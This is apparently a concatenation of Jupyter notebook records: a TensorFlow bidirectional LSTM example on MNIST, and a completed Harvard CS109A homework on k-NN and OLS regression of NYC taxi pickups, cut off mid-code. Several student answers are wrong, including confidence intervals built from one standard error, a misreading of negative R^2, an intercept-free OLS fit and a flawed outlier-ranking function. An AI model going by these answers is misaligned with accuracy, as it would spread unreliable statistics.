bc = CDF(b); bc
bc.abs()
bc.arg()/N(2*pi/14)
sg = [b^i for i in range(7)]; sg
c = sg[3]; d = sg[5]
c*d
c = sg[3]; d = sg[6]
c*d in sg
c*d == sg[2]
sg[5]*sg[6] == sg[4]
G.multiplication_table(elements=sg)
| 0.396652 | 0.786664 |
# Bi-directional Recurrent Neural Network Example
Build a bi-directional recurrent neural network (LSTM) with TensorFlow 2.0.
- Author: Aymeric Damien
- Project: https://github.com/aymericdamien/TensorFlow-Examples/
## BiRNN Overview
<img src="https://ai2-s2-public.s3.amazonaws.com/figures/2016-11-08/191dd7df9cb91ac22f56ed0dfa4a5651e8767a51/1-Figure2-1.png" alt="nn" style="width: 600px;"/>
References:
- [Long Short Term Memory](http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf), Sepp Hochreiter & Jurgen Schmidhuber, Neural Computation 9(8): 1735-1780, 1997.
## MNIST Dataset Overview
This example is using MNIST handwritten digits. The dataset contains 60,000 examples for training and 10,000 examples for testing. The digits have been size-normalized and centered in a fixed-size image (28x28 pixels) with values from 0 to 1. For simplicity, each image has been flattened and converted to a 1-D numpy array of 784 features (28*28).

To classify images using a recurrent neural network, we consider every image row as a sequence of pixels. Because MNIST image shape is 28*28px, we will then handle 28 sequences of 28 timesteps for every sample.
More info: http://yann.lecun.com/exdb/mnist/
```
from __future__ import absolute_import, division, print_function
# Import TensorFlow v2.
import tensorflow as tf
from tensorflow.keras import Model, layers
import numpy as np
# MNIST dataset parameters.
num_classes = 10 # total classes (0-9 digits).
num_features = 784 # data features (img shape: 28*28).
# Training Parameters
learning_rate = 0.001
training_steps = 1000
batch_size = 32
display_step = 100
# Network Parameters
# MNIST image shape is 28*28px, we will then handle 28 sequences of 28 timesteps for every sample.
num_input = 28 # number of sequences.
timesteps = 28 # timesteps.
num_units = 32 # number of neurons for the LSTM layer.
# Prepare MNIST data.
from tensorflow.keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# Convert to float32.
x_train, x_test = np.array(x_train, np.float32), np.array(x_test, np.float32)
# Flatten images to 1-D vector of 784 features (28*28).
x_train, x_test = x_train.reshape([-1, 28, 28]), x_test.reshape([-1, num_features])
# Normalize images value from [0, 255] to [0, 1].
x_train, x_test = x_train / 255., x_test / 255.
# Use tf.data API to shuffle and batch data.
train_data = tf.data.Dataset.from_tensor_slices((x_train, y_train))
train_data = train_data.repeat().shuffle(5000).batch(batch_size).prefetch(1)
# Create LSTM Model.
class BiRNN(Model):
# Set layers.
def __init__(self):
super(BiRNN, self).__init__()
# Define 2 LSTM layers for forward and backward sequences.
lstm_fw = layers.LSTM(units=num_units)
lstm_bw = layers.LSTM(units=num_units, go_backwards=True)
# BiRNN layer.
self.bi_lstm = layers.Bidirectional(lstm_fw, backward_layer=lstm_bw)
# Output layer (num_classes).
self.out = layers.Dense(num_classes)
# Set forward pass.
def call(self, x, is_training=False):
x = self.bi_lstm(x)
x = self.out(x)
if not is_training:
# tf cross entropy expect logits without softmax, so only
# apply softmax when not training.
x = tf.nn.softmax(x)
return x
# Build LSTM model.
birnn_net = BiRNN()
# Cross-Entropy Loss.
# Note that this will apply 'softmax' to the logits.
def cross_entropy_loss(x, y):
# Convert labels to int 64 for tf cross-entropy function.
y = tf.cast(y, tf.int64)
# Apply softmax to logits and compute cross-entropy.
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=x)
# Average loss across the batch.
return tf.reduce_mean(loss)
# Accuracy metric.
def accuracy(y_pred, y_true):
# Predicted class is the index of highest score in prediction vector (i.e. argmax).
correct_prediction = tf.equal(tf.argmax(y_pred, 1), tf.cast(y_true, tf.int64))
return tf.reduce_mean(tf.cast(correct_prediction, tf.float32), axis=-1)
# Adam optimizer.
optimizer = tf.optimizers.Adam(learning_rate)
# Optimization process.
def run_optimization(x, y):
# Wrap computation inside a GradientTape for automatic differentiation.
with tf.GradientTape() as g:
# Forward pass.
pred = birnn_net(x, is_training=True)
# Compute loss.
loss = cross_entropy_loss(pred, y)
# Variables to update, i.e. trainable variables.
trainable_variables = birnn_net.trainable_variables
# Compute gradients.
gradients = g.gradient(loss, trainable_variables)
# Update W and b following gradients.
optimizer.apply_gradients(zip(gradients, trainable_variables))
# Run training for the given number of steps.
for step, (batch_x, batch_y) in enumerate(train_data.take(training_steps), 1):
# Run the optimization to update W and b values.
run_optimization(batch_x, batch_y)
if step % display_step == 0:
pred = birnn_net(batch_x, is_training=True)
loss = cross_entropy_loss(pred, batch_y)
acc = accuracy(pred, batch_y)
print("step: %i, loss: %f, accuracy: %f" % (step, loss, acc))
```
|
github_jupyter
|
from __future__ import absolute_import, division, print_function
# Import TensorFlow v2.
import tensorflow as tf
from tensorflow.keras import Model, layers
import numpy as np
# MNIST dataset parameters.
num_classes = 10 # total classes (0-9 digits).
num_features = 784 # data features (img shape: 28*28).
# Training Parameters
learning_rate = 0.001
training_steps = 1000
batch_size = 32
display_step = 100
# Network Parameters
# MNIST image shape is 28*28px, we will then handle 28 sequences of 28 timesteps for every sample.
num_input = 28 # number of sequences.
timesteps = 28 # timesteps.
num_units = 32 # number of neurons for the LSTM layer.
# Prepare MNIST data.
from tensorflow.keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# Convert to float32.
x_train, x_test = np.array(x_train, np.float32), np.array(x_test, np.float32)
# Flatten images to 1-D vector of 784 features (28*28).
x_train, x_test = x_train.reshape([-1, 28, 28]), x_test.reshape([-1, num_features])
# Normalize images value from [0, 255] to [0, 1].
x_train, x_test = x_train / 255., x_test / 255.
# Use tf.data API to shuffle and batch data.
train_data = tf.data.Dataset.from_tensor_slices((x_train, y_train))
train_data = train_data.repeat().shuffle(5000).batch(batch_size).prefetch(1)
# Create LSTM Model.
class BiRNN(Model):
# Set layers.
def __init__(self):
super(BiRNN, self).__init__()
# Define 2 LSTM layers for forward and backward sequences.
lstm_fw = layers.LSTM(units=num_units)
lstm_bw = layers.LSTM(units=num_units, go_backwards=True)
# BiRNN layer.
self.bi_lstm = layers.Bidirectional(lstm_fw, backward_layer=lstm_bw)
# Output layer (num_classes).
self.out = layers.Dense(num_classes)
# Set forward pass.
def call(self, x, is_training=False):
x = self.bi_lstm(x)
x = self.out(x)
if not is_training:
# tf cross entropy expect logits without softmax, so only
# apply softmax when not training.
x = tf.nn.softmax(x)
return x
# Build LSTM model.
birnn_net = BiRNN()
# Cross-Entropy Loss.
# Note that this will apply 'softmax' to the logits.
def cross_entropy_loss(x, y):
# Convert labels to int 64 for tf cross-entropy function.
y = tf.cast(y, tf.int64)
# Apply softmax to logits and compute cross-entropy.
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=x)
# Average loss across the batch.
return tf.reduce_mean(loss)
# Accuracy metric.
def accuracy(y_pred, y_true):
# Predicted class is the index of highest score in prediction vector (i.e. argmax).
correct_prediction = tf.equal(tf.argmax(y_pred, 1), tf.cast(y_true, tf.int64))
return tf.reduce_mean(tf.cast(correct_prediction, tf.float32), axis=-1)
# Adam optimizer.
optimizer = tf.optimizers.Adam(learning_rate)
# Optimization process.
def run_optimization(x, y):
# Wrap computation inside a GradientTape for automatic differentiation.
with tf.GradientTape() as g:
# Forward pass.
pred = birnn_net(x, is_training=True)
# Compute loss.
loss = cross_entropy_loss(pred, y)
# Variables to update, i.e. trainable variables.
trainable_variables = birnn_net.trainable_variables
# Compute gradients.
gradients = g.gradient(loss, trainable_variables)
# Update W and b following gradients.
optimizer.apply_gradients(zip(gradients, trainable_variables))
# Run training for the given number of steps.
for step, (batch_x, batch_y) in enumerate(train_data.take(training_steps), 1):
# Run the optimization to update W and b values.
run_optimization(batch_x, batch_y)
if step % display_step == 0:
pred = birnn_net(batch_x, is_training=True)
loss = cross_entropy_loss(pred, batch_y)
acc = accuracy(pred, batch_y)
print("step: %i, loss: %f, accuracy: %f" % (step, loss, acc))
| 0.927863 | 0.985086 |
# <img style="float: left; padding-right: 10px; width: 45px" src="https://raw.githubusercontent.com/Harvard-IACS/2018-CS109A/master/content/styles/iacs.png"> CS109A Introduction to Data Science:
## Homework 2: Linear and k-NN Regression
**Harvard University**<br/>
**Fall 2019**<br/>
**Instructors**: Pavlos Protopapas, Kevin Rader, and Chris Tanner
<hr style="height:2pt">
```
#RUN THIS CELL
import requests
from IPython.core.display import HTML
styles = requests.get("https://raw.githubusercontent.com/Harvard-IACS/2018-CS109A/master/content/styles/cs109.css").text
HTML(styles)
```
### INSTRUCTIONS
- To submit your assignment follow the instructions given in canvas.
- As much as possible, try and stick to the hints and functions we import at the top of the homework, as those are the ideas and tools the class supports and is aiming to teach. And if a problem specifies a particular library you're required to use that library, and possibly others from the import list.
- Restart the kernel and run the whole notebook again before you submit.
- Please use .head() when viewing data. Do not submit a notebook that is excessively long because output was not suppressed.
<hr style="height:2pt">
```
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
from sklearn.metrics import r2_score
from sklearn.neighbors import KNeighborsRegressor
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
import statsmodels.api as sm
from statsmodels.api import OLS
%matplotlib inline
```
## <div class="theme"> <b>Predicting Taxi Pickups in NYC</b> </div>
In this homework, we will explore k-nearest neighbor and linear regression methods for predicting a quantitative variable. Specifically, we will build regression models that can predict the number of taxi pickups in New York city at any given time of the day. These prediction models will be useful, for example, in monitoring traffic in the city.
The data set for this problem is given in the file `nyc_taxi.csv`. You will need to separate it into training and test sets. The first column contains the time of a day in minutes, and the second column contains the number of pickups observed at that time. The data set covers taxi pickups recorded in NYC during Jan 2015.
We will fit regression models that use the time of the day (in minutes) as a predictor and predict the average number of taxi pickups at that time. The models will be fitted to the training set and evaluated on the test set. The performance of the models will be evaluated using the $R^2$ metric.
### <div class="exercise"> <b> Question 1 [20 pts]</b> </div>
**1.1**. Use pandas to load the dataset from the csv file `nyc_taxi.csv` into a pandas data frame. Use the `train_test_split` method from `sklearn` with a `random_state` of 42 and a `test_size` of 0.2 to split the dataset into training and test sets. Store your train set data frame as `train_data` and your test set data frame as `test_data`.
**1.2**. Generate a scatter plot of the training data points with clear labels on the x and y axes to demonstrate how the number of taxi pickups is dependent on the time of the day. Be sure to title your plot.
**1.3**. In a few sentences, describe the general pattern of taxi pickups over the course of the day and explain why this is a reasonable result.
**1.4**. You should see a *hole* in the scatter plot when `TimeMin` is 500-550 minutes and `PickupCount` is roughly 20-30 pickups. Briefly surmise why this may be the case. This will not be graded harshly, we just want you to think and communicate about the cause.
### Answers
**1.1 Use pandas to load the dataset from the csv file ...**
```
df = pd.DataFrame(pd.read_csv('data/nyc_taxi.csv'))
print(df.head(10))
train_data, test_data = train_test_split(df, test_size=0.2, random_state=42)
```
**1.2 Generate a scatter plot of the training data points**
```
def convert_hours(minutes):
minutes = int(minutes)
return '%d:%s%s' % ((minutes / 60) % 12, str(minutes % 60).zfill(2), 'AM' if minutes < 720 else 'PM')
time = []
for t_min in range(0, 1440, 60):
time.append(convert_hours(t_min))
#print ('%d min is %s' % (t_min, convert_hours(t_min)))
plt.rcParams["figure.figsize"] = (20,10)
plt.scatter(train_data['TimeMin'].values, train_data['PickupCount'].values)
plt.xlabel('Time of day in minutes')
plt.ylabel('Number of pickups')
plt.title('NYC Taxi pickups by time of day')
plt.xticks(np.arange(0, 1380, step=60),time)
plt.show()
```
**1.3 In a few sentences, describe the general pattern of taxi pickups over the course of the day and explain why this is a reasonable result.**
Peak taxi time should be in the mid- to late evening (1100-1440 min), with spikes around the times when restaurants and clubs close (around 12am-2am, or 0-120 min). This matches our observations in the scatter plot. In addition, we would expect a minor peak around the time when people are going to work, which should be around 6:30-8:30am, or 390-510min. This expected spike also appears in the plot.
**1.4 You should see a *hole* in the scatter plot when `TimeMin` is 500-550 minutes...**
```
subset = df.loc[(df['TimeMin'] >= 500) & (df['TimeMin'] <= 550)].sort_values(by='TimeMin')
subset['TimeHours'] = [convert_hours(x) for x in subset['TimeMin']]
print(subset)
```
Looking at the subset data above, we see either low or high values for identical times. The simplest explanation is that this is peak commuting time, so the low numbers represent Sat/Sun and the high numbers represent weekdays. We could take this into account for our model if weekday is also an available predictor.
<hr>
### <div class="exercise"> <b>Question 2 [25 pts]</b> </div>
In lecture we've seen k-Nearest Neighbors (k-NN) Regression, a non-parametric regression technique. In the following problems please use built in functionality from `sklearn` to run k-NN Regression.
**2.1**. Choose `TimeMin` as your feature variable and `PickupCount` as your response variable. Create a dictionary of `KNeighborsRegressor` objects and call it `KNNModels`. Let the key for your `KNNmodels` dictionary be the value of $k$ and the value be the corresponding `KNeighborsRegressor` object. For $k \in \{1, 10, 75, 250, 500, 750, 1000\}$, fit k-NN regressor models on the training set (`train_data`).
**2.2**. For each $k$, overlay a scatter plot of the actual values of `PickupCount` vs. `TimeMin` in the training set with a scatter plot of **predictions** for `PickupCount` vs `TimeMin`. Do the same for the test set. You should have one figure with 7 x 2 total subplots; for each $k$ the figure should have two subplots, one subplot for the training set and one for the test set.
**Hints**:
1. Each subplot should use different color and/or markers to distinguish k-NN regression prediction values from the actual data values.
2. Each subplot must have appropriate axis labels, title, and legend.
3. The overall figure should have a title.
**2.3**. Report the $R^2$ score for the fitted models on both the training and test sets for each $k$ (reporting the values in tabular form is encouraged).
**2.4**. Plot, in a single figure, the $R^2$ values from the model on the training and test set as a function of $k$.
**Hints**:
1. Again, the figure must have axis labels and a legend.
2. Differentiate $R^2$ plots on the training and test set by color and/or marker.
3. Make sure the $k$ values are sorted before making your plot.
**2.5**. Discuss the results:
1. If $n$ is the number of observations in the training set, what can you say about a k-NN regression model that uses $k = n$?
2. What does an $R^2$ score of $0$ mean?
3. What would a negative $R^2$ score mean? Are any of the calculated $R^2$ you observe negative?
4. Do the training and test $R^2$ plots exhibit different trends? Describe.
5. What is the best value of $k$? How did you come to choose this value? How do the corresponding training/test set $R^2$ values compare?
6. Use the plots of the predictions (in 2.2) to justify why your choice of the best $k$ makes sense (**Hint**: think Goldilocks).
### Answers
**2.1 Choose `TimeMin` as your feature variable and `PickupCount` as your response variable. Create a dictionary...**
```
def single_pred(df):
return df.values.reshape(-1, 1)
def fitKNN(k, data):
knr = KNeighborsRegressor(n_neighbors=k)
knr.fit(single_pred(data['TimeMin']), data['PickupCount'].values)
return knr
KNNmodels = dict()
k_vals = [1, 10, 75, 250, 500, 750, 1000]
for k in k_vals:
KNNmodels[k] = fitKNN(k, train_data)
```
**2.2 For each $k$, overlay a scatter plot of the actual values of `PickupCount` vs. `TimeMin` in the training set...**
```
i = 1
plt.figure(figsize=(10, 12))
predictions = {'train': dict(), 'test': dict()}
for k in k_vals:
for t in ['train', 'test']:
plt.subplot(7, 2, i)
i += 1
data = {'train': train_data, 'test': test_data}[t]
predictions[t][k] = KNNmodels[k].predict(single_pred(data['TimeMin']))
plt.scatter(data['TimeMin'].values, data['PickupCount'].values)
plt.scatter(data['TimeMin'].values, predictions[t][k])
plt.xlabel('Time of day in minutes')
plt.ylabel('Number of pickups')
plt.title("Actual and predicted pickups for k=%d (%s)" % (k, t))
plt.legend(['actual', 'predicted'])
plt.subplots_adjust(top=3, wspace=0.4, hspace=0.4)
plt.suptitle("NYC Taxi pickup predictions for different k values", fontsize=18, x=.5, y=3.05)
plt.show()
```
**2.3 Report the $R^2$ score for the fitted models on both the training and test sets for each $k$ (reporting the values in tabular form is encouraged).**
```
r2 = pd.DataFrame(columns=['k', 'Type', 'R-squared'])
for k in k_vals:
for t in ['train', 'test']:
data = {'train': train_data, 'test': test_data}[t]
r2 = r2.append({'k': k,
'Type': t,
'R-squared': r2_score(data['PickupCount'].values, predictions[t][k])},
ignore_index=True)
display(r2)
```
**2.4 Plot, in a single figure, the $R^2$ values from the model on the training and test set as a function of $k$.**
```
tr, tst = r2.loc[r2['Type'] == 'train'], r2.loc[r2['Type'] == 'test']
plt.plot(tr['k'].values, tr['R-squared'].values)
plt.plot(tst['k'].values, tst['R-squared'].values)
plt.legend(['Training Accuracy', 'Test Accuracy'])
plt.xlabel("Nearest neighbor count (k)")
plt.ylabel('R-squared value')
plt.title('R-squared versus k-value')
```
**2.5 Discuss the results:**
1. If $n$ is the number of observations in the training set, what can you say about a k-NN regression model that uses $k = n$?
When $k = n$, the prediction is simply the mean, since all data points are used.
2. What does an $R^2$ score of $0$ mean?
An $R^2$ of $0$ indicates that there is no linear correlation between the feature(s) and the response; this is what we would expect to observe if the data were entirely uncorrelated, or if our model were so poor as to be no more predictive than using the mean of the data. Of course, this is approximately what we see for $k=1000$.
3. What would a negative $R^2$ score mean? Are any of the calculated $R^2$ you observe negative?
A negative $R^2$ indicates negative linear correlation: in other words, that the model predicts even worse than the mean. We see a negative score for $k=1$ on the test set, which indicates severe overfitting to our training data.
4. Do the training and test $R^2$ plots exhibit different trends? Describe.
The training $R^2$ plot starts at a high value and drops as $k$ increases, which we would expect given that our KNN model is fitting very closely to the training data at low $k$. The test plot exhibits a very different trend, with $R^2$ starting negative, rising to a peak around $k=75$, and falling off to converge with the training plot at high values of $k$. This makes sense because training and test error should converge as $k$ rises, but when the value is too high, the KNN model reverts towards a simple mean prediction, yielding worse $R^2$ values on both training and test data.
5. What is the best value of $k$? How did you come to choose this value? How do the corresponding training/test set $R^2$ values compare?
$k=75$ yields the best test $R^2$ value, and is therefore the best value for this data set. The training and test $R^2$ values are fairly close together, with test slightly lower than training. The $R^2$ divergence drops as $k$ rises.
6. Use the plots of the predictions (in 2.2) to justify why your choice of the best $k$ makes sense (**Hint**: think Goldilocks).** ****
In this case, our Goldilocks principle would suggest that the best $k$ value achieves relatively high test $R^2$ with relatively low difference between training and test $R^2$ values. In other words, it captures the training distribution well, but still demonstrates a capacity to generalize.
<hr>
### <div class="exercise"> <b> Question 3 [25 pts] </b></div>
We next consider simple linear regression, which we know from lecture is a parametric approach for regression that assumes that the response variable has a linear relationship with the predictor. Use the `statsmodels` module for Linear Regression. This module has built-in functions to summarize the results of regression and to compute confidence intervals for estimated regression parameters.
**3.1**. Again choose `TimeMin` as your predictor and `PickupCount` as your response variable. Create an `OLS` class instance and use it to fit a Linear Regression model on the training set (`train_data`). Store your fitted model in the variable `OLSModel`.
**3.2**. Create a plot just like you did in 2.2 (but with fewer subplots): plot both the observed values and the predictions from `OLSModel` on the training and test set. You should have one figure with two subplots, one subplot for the training set and one for the test set.
**Hints**:
1. Each subplot should use different color and/or markers to distinguish Linear Regression prediction values from that of the actual data values.
2. Each subplot must have appropriate axis labels, title, and legend.
3. The overall figure should have a title.
**3.3**. Report the $R^2$ score for the fitted model on both the training and test sets.
**3.4**. Report the estimates for the slope and intercept for the fitted linear model.
**3.5**. Report the $95\%$ confidence intervals (CIs) for the slope and intercept.
**3.6**. Discuss the results:
1. How does the test $R^2$ score compare with the best test $R^2$ value obtained with k-NN regression? Describe why this is not surprising for these data.
2. What does the sign of the slope of the fitted linear model convey about the data?
3. Interpret the $95\%$ confidence intervals from 3.5. Based on these CIs is there evidence to suggest that the number of taxi pickups has a significant linear relationship with time of day? How do you know?
4. How would $99\%$ confidence intervals for the slope and intercept compare to the $95\%$ confidence intervals (in terms of midpoint and width)? Briefly explain your answer.
5. Based on the data structure, what restriction on the model would you put at the endpoints (at $x\approx0$ and $x\approx1440$)? What does this say about the appropriateness of a linear model?
### Answers
**3.1 Again choose `TimeMin` as your predictor and `PickupCount` as your response variable...**
```
train_data_X = sm.add_constant(train_data['TimeMin'])
model = OLS(train_data['PickupCount'], train_data_X)
```
**3.2 Create a plot just like you did in 2.2 (but with fewer subplots)...**
```
results = model.fit()
i = 1
plt.figure(figsize=(10, 2))
plt.subplots_adjust(top=2, wspace=0.4, hspace=0.4)
plt.suptitle("NYC Taxi pickup predictions OLS train and test", fontsize=18, x=.5, y=2.3)
OLS_predictions = dict()
for t in ['train', 'test']:
plt.subplot(1, 2, i)
i += 1
data = {'train': train_data, 'test': test_data}[t]
data_X = sm.add_constant(data['TimeMin'])
OLS_predictions[t] = results.predict(data_X)
plt.scatter(data['TimeMin'].values, data['PickupCount'].values)
plt.plot(data['TimeMin'].values, OLS_predictions[t], color='orange')
plt.xlabel('Time of day in minutes')
plt.ylabel('Number of pickups')
plt.title("Actual and predicted pickups with OLS (%s)" % t)
plt.legend(['predicted', 'actual'])
```
**3.3 Report the $R^2$ score for the fitted model on both the training and test sets.**
```
for t in ['train', 'test']:
data = {'train': train_data, 'test': test_data}[t]
print("R-squared for %s is %f" % (t, r2_score(data['PickupCount'].values, OLS_predictions[t])))
```
**3.4 Report the estimates for the slope and intercept for the fitted linear model.**
```
print(results.summary())
print("Slope is %.3f" % results.params['TimeMin'])
print("Intercept is %.2f" % results.params['const'])
```
**3.5 Report the $95\%$ confidence intervals (CIs) for the slope and intercept.**
```
c_se, t_se = results.bse['const'], results.bse['TimeMin']
slope, intercept = results.params['TimeMin'], results.params['const']
print("95%% confidence interval for slope is [%.4f, %.4f]" % (slope - t_se, slope + t_se))
print("95%% confidence interval for intercept is [%.2f, %.2f]" % (intercept - c_se, intercept + c_se))
```
**3.6 Discuss the results:**
1. How does the test $R^2$ score compare with the best test $R^2$ value obtained with k-NN regression? Describe why this is not surprising for these data.
The $R^2$ value is quite low compared to that for kNN, which is natural given that the data is highly nonlinear and exhibits strong local dependencies.
2. What does the sign of the slope of the fitted linear model convey about the data?
Generally speaking, the later in the day it is, the more pickups we should expect.
3. Interpret the $95\%$ confidence intervals from 3.5. Based on these CIs is there evidence to suggest that the number of taxi pickups has a significant linear relationship with time of day? How do you know?
Since the CIs do not contain 0 in either case, we can be confident at the 95% level that the number of taxi pickups is positively correlated with the time of day.
4. How would $99\%$ confidence intervals for the slope and intercept compare to the $95\%$ confidence intervals (in terms of midpoint and width)? Briefly explain your answer.
The 99% confidence intervals would have the same midpoint but a significantly greater width - by just over half a standard error on each side, since the z-score for 95% confidence is 1.96 and that for 99% is 2.58.
5. Based on the data structure, what restriction on the model would you put at the endpoints (at $x\approx0$ and $x\approx1440$)? What does this say about the appropriateness of a linear model?
$x\approx0$ and $x\approx1440$ represent the same time on successive days, and therefore our predictions for the two should be the same if the day within the week is unknown. The fact that the linear model shows a statistically significant positive slope thus provides a further confirmation that the linear model is inappropriate.
<hr>
## <div class="theme"> Outliers </div>
You may recall from lectures that OLS Linear Regression can be susceptible to outliers in the data. We're going to look at a dataset that includes some outliers and get a sense for how that affects modeling data with Linear Regression. **Note, this is an open-ended question, there is not one correct solution (or even one correct definition of an outlier).**
### <div class="exercise"><b> Question 4 [30 pts] </b></div>
**4.1**. We've provided you with two files `outliers_train.csv` and `outliers_test.csv` corresponding to training set and test set data. What does a visual inspection of training set tell you about the existence of potential outliers in the data?
**4.2**. Choose `X` as your feature variable and `Y` as your response variable. Use `statsmodel` to create a Linear Regression model on the training set data. Store your model in the variable `OutlierOLSModel`.
**4.3**. You're given the knowledge ahead of time that there are 3 outliers in the training set data. The test set data doesn't have any outliers. You want to remove the 3 outliers in order to get the optimal intercept and slope. In the case that you're sure of the existence and number (3) of outliers ahead of time, one potential brute force method to outlier detection might be to find the best Linear Regression model on all possible subsets of the training set data with 3 points removed. Using this method, how many times will you have to calculate the Linear Regression coefficients on the training data?
**4.4** Construct an approximate algorithm to find a user-specified number of outlier candidates in the training data. Place your algorithm in the function `find_outliers_simple`. It should take the parameters `dataset_x`, `dataset_y`, and `num_outliers` representing your features, response variable values (make sure your response variable is stored as a numpy column vector), and the number of outliers to remove. Your algorithm should select the `num_outliers` most extreme residuals from the linear regression model to predict, `dataset_y` from `dataset_x`. The return value should be a list `outlier_indices` representing the indices of the `num_outliers` outliers in the original datasets you passed in. Apply your function to the training data in order to identify 3 outliers. Use `statsmodels` to create a Linear Regression model on the remaining training set data (with the 3 outliers removed), and store your model in the variable `OutlierFreeSimpleModel`.
**4.5** Create a figure with two subplots: the first is a scatterplot where the color of the points denotes the outliers from the non-outliers in the training set, and include two regression lines on this scatterplot: one fitted with the outliers included and one fitted with the outlier removed (all on the training set). The second plot should include a scatterplot of points from the test set with the same two regression lines fitted on the training set: with and without outliers. Visually which model fits the test set data more closely?
**4.6**. Calculate the $R^2$ score for the `OutlierOLSModel` and the `OutlierFreeSimpleModel` on the test set data. Which model produces a better $R^2$ score?
**4.7**. One potential problem with the brute force outlier detection approach in 4.3 and the heuristic algorithm you constructed 4.4 is that they assume prior knowledge of the number of outliers. In general you can't expect to know ahead of time the number of outliers in your dataset. Propose how you would alter and/or use the algorithm you constructed in 4.4 to create a more general heuristic (i.e. one which doesn't presuppose the number of outliers) for finding outliers in your dataset.
**Hints**:
1. Should outliers be removed one at a time or in batches?
2. What metric would you use and how would you use it to determine how many outliers to consider removing?
### Answers
**4.1 We've provided you with two files `outliers_train.txt` and `outliers_test.txt` corresponding to training set and test set data. What does a visual inspection of training set tell you about the existence of outliers in the data?**
```
out_train = pd.read_csv('data/outliers_train.csv')
out_test = pd.read_csv('data/outliers_test.csv')
fig, ax = plt.subplots(2,1)
ax[0].scatter(out_train['X'],out_train['Y'])
ax[0].set_title("Training data")
ax[1].scatter(out_test['X'],out_test['Y'])
ax[1].set_title("Test data")
plt.show()
```
The data overall seems pretty loosely correlated (showing an upward slope), with some severe outliers (especially in the training data). For example, the training data has points at roughly (-2, 300) and (2, -300), which will distort a linear regression.
**4.2 Choose `X` as your feature variable and `Y` as your response variable. Use `statsmodel` to create a Linear Regression model on the training set data. Store your model in the variable `OutlierOLSModel`.**
```
OutlierOLSModel = OLS(out_train['Y'], out_train['X'])
outlier_model_results = OutlierOLSModel.fit()
```
**4.3 You're given the knowledge ahead of time that there are 3 outliers...Using this method, how many times will you have to calculate the Linear Regression coefficients on the training data?**
We know that the dataset has 53 rows, so the brute force method would have us run 53 "choose" 50 linear regressions, which equals 23,426.
**4.4 Construct an approximate algorithm to find a user-specified number of outlier candidates in the training data...**
```
def find_outliers_simple(dataset_x, dataset_y, num_outliers):
residuals = np.abs(dataset_y - outlier_model_results.predict(out_train['X']))
table = pd.DataFrame({'ranks':np.argsort(residuals)})
outlier_indices = list(table.index[table['ranks'] > (len(table) - num_outliers - 1)])
return list(outlier_indices)
outliers = find_outliers_simple(out_train['X'], out_train['Y'], 3)
out_train_no_outliers = out_train.drop(outliers)
OutlierFreeSimpleModel = OLS(out_train_no_outliers['Y'], out_train_no_outliers['X'])
outlier_free_model_results = OutlierFreeSimpleModel.fit()
```
**4.5 Create a figure with two subplots: the first is a scatterplot where the color of the points...**
```
fig, ax = plt.subplots(1,2)
ax[0].scatter(out_train['X'], out_train['Y'])
ax[0].scatter(out_train_no_outliers['X'], out_train_no_outliers['Y'], color='orange')
ax[0].plot(out_train['X'], outlier_model_results.predict(out_train['X']))
ax[0].plot(out_train_no_outliers['X'], outlier_free_model_results.predict(out_train_no_outliers['X']))
ax[0].set_title("Training set")
ax[1].scatter(out_test['X'], out_test['Y'])
ax[1].plot(out_train['X'], outlier_model_results.predict(out_train['X']))
ax[1].plot(out_train_no_outliers['X'], outlier_free_model_results.predict(out_train_no_outliers['X']))
ax[1].set_title("Test set")
plt.show()
```
The better results come from the fitted lines without outliers (the orange line). The outliers skew the slope of the line (the model weights).
**4.6 Calculate the $R^2$ score for the `OutlierOLSModel` and the `OutlierFreeSimpleModel` on the test set data. Which model produces a better $R^2$ score?**
```
print("R-squared for OutlierOLSModel is %f" % (r2_score(out_test['Y'].values, outlier_model_results.predict(out_test['X']))))
print("R-squared for OutlierFreeSimpleModel is %f" % (r2_score(out_test['Y'].values, outlier_free_model_results.predict(out_test['X']))))
```
The outlier-free model produces a better $R^2$ value.
**4.7 One potential problem with the brute force outlier detection approach in 4.3 and the heuristic algorithm you constructed 4.4 is that they assume prior knowledge of the number of outliers...**
Rather than removing a pre-set number of points, I would find outliers in the data by removing any points where the residual was more than 3 standard deviations above or below the mean of the residuals. This would filter out all extreme outliers at once, regardless of how many there are.
|
github_jupyter
|
#RUN THIS CELL
import requests
from IPython.core.display import HTML
styles = requests.get("https://raw.githubusercontent.com/Harvard-IACS/2018-CS109A/master/content/styles/cs109.css").text
HTML(styles)
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
from sklearn.metrics import r2_score
from sklearn.neighbors import KNeighborsRegressor
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
import statsmodels.api as sm
from statsmodels.api import OLS
%matplotlib inline
df = pd.DataFrame(pd.read_csv('data/nyc_taxi.csv'))
print(df.head(10))
train_data, test_data = train_test_split(df, test_size=0.2, random_state=42)
def convert_hours(minutes):
minutes = int(minutes)
return '%d:%s%s' % ((minutes / 60) % 12, str(minutes % 60).zfill(2), 'AM' if minutes < 720 else 'PM')
time = []
for t_min in range(0, 1440, 60):
time.append(convert_hours(t_min))
#print ('%d min is %s' % (t_min, convert_hours(t_min)))
plt.rcParams["figure.figsize"] = (20,10)
plt.scatter(train_data['TimeMin'].values, train_data['PickupCount'].values)
plt.xlabel('Time of day in minutes')
plt.ylabel('Number of pickups')
plt.title('NYC Taxi pickups by time of day')
plt.xticks(np.arange(0, 1380, step=60),time)
plt.show()
subset = df.loc[(df['TimeMin'] >= 500) & (df['TimeMin'] <= 550)].sort_values(by='TimeMin')
subset['TimeHours'] = [convert_hours(x) for x in subset['TimeMin']]
print(subset)
def single_pred(df):
return df.values.reshape(-1, 1)
def fitKNN(k, data):
knr = KNeighborsRegressor(n_neighbors=k)
knr.fit(single_pred(data['TimeMin']), data['PickupCount'].values)
return knr
KNNmodels = dict()
k_vals = [1, 10, 75, 250, 500, 750, 1000]
for k in k_vals:
KNNmodels[k] = fitKNN(k, train_data)
i = 1
plt.figure(figsize=(10, 12))
predictions = {'train': dict(), 'test': dict()}
for k in k_vals:
for t in ['train', 'test']:
plt.subplot(7, 2, i)
i += 1
